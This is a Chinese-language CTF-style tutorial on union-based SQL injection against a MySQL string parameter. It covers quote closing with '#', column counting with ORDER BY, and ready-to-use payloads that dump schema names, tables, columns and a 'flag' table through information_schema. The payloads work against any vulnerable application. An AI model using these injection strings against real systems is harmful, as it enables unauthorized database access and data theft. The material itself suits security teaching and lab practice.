1.列出所有数据库
limit 一个一个打印出来库名
-1' union select 1 , (select schema_name from information_schema.schemata limit 0,1) #
group_concat 一次性全部显示
-1' union select 1,group_concat(schema_name) from information_schema.schemata #
2.列出(数据库: sqli )中所有的表名
limit 一个一个打印出来表名
-1' union select 1 , (select table_name from information_schema.tables where table_schema='sqli' limit 0,1) #
group_concat 一次性全部显示
-1' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' #
3.列出(数据库:sqli 表:flag)中所有的字段名
limit 一个一个打印出来字段名
-1' union select 1 , (select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) #
group_concat 一次性全部显示
-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#
4.列出(数据库:sqli表:flag)中字段名的内容
limit 一个一个打印出来字段名中的内容
-1' union select 1,(select flag from flag) #
group_concat 一次性全部显示
-1' union select 1 , group_concat(flag) from flag #
字符型是字母数字及规定内的符号组合而成的串
可以是单一的字母、数字、符号需要用引号引起来
你可以和数值型进行比对一下
数值型一般都可以参与运算
而字符型就不可以
(1)根据提示,输入1,返回可以看到‘1’被双引号包围
(2)根据返回我们应该知道此时的注入语句只有满足字符型,才可以被正确执行,我们的id里的值需要被引号包围,
(3)这里可以借助注释符#
注释符:
在MySQL中,常见注释符的表达方式:#或- -空格或/**/
使用#将后面的单引号注释掉
PS:注入语句中的引号必须是英文环境下的,每个字词都可以用空格分隔,看自己的个人习惯
1' #
(1)先从小的开始,两列开始判断
1' order by 1 , 2 #
(2)以此往后,判断三列,到三列时发现无法显示,说明只有两列
1' order by 1 , 2 , 3 #
一般在我们可见页面中显示的信息不一定是查询全部列数,可能查询3列,显示1列。通过-1’直接闭合前面的select语句,使其前半句查询结果空(除非存在id=-1的情况),即数据库中不存在该查询数据,然后通过union select 1,2 显示的数字来确定显示的列的位置。
1为ID
2为Data
(Data也就是我们想要查询的数据)
-1' union select 1 , 2#
(1)查询用户:user()
PS:如果为root用户,就可以访问information_schema数据库
-1' union select 1 , user() #
-1' union select 1 , version() #
-1' union select 1 , database() #
(1)使用limit一条一条查询数据库名称
查询第一条
-1' union select 1 , (select schema_name from information_schema.schemata limit 0,1) #
-1' union select 1 , (select schema_name from information_schema.schemata limit 1,1) #
-1' union select 1 , (select schema_name from information_schema.schemata limit 2,1) #
-1' union select 1 , (select schema_name from information_schema.schemata limit 3,1) #
-1' union select 1 , (select schema_name from information_schema.schemata limit 4,1) #
(2)使用group_concat()一次性查询全部数据库名称
-1' union select 1,group_concat(schema_name) from information_schema.schemata #
(1) 使用group_concat()一次性爆出所有表名
①法一
-1' union select table_schema, group_concat(table_name) from information_schema.tables where table_schema='sqli' #
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
-1' union select 1 , (select table_name from information_schema.tables where table_schema='sqli' limit 0,1) #
-1' union select 1 , (select table_name from information_schema.tables where table_schema='sqli' limit 1,1) #
(1)用limit一列一列爆出字段名
第一条
-1' union select 1 , (select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1) #
-1' union select 1 , (select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 1,1) #
-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#
(1)用limit一列一列爆出字段名中的内容
-1' union select 1,(select flag from flag) #
(2)使用group_concat()一次性爆出所有字段名中的内容
-1' union select 1 , group_concat(flag) from flag #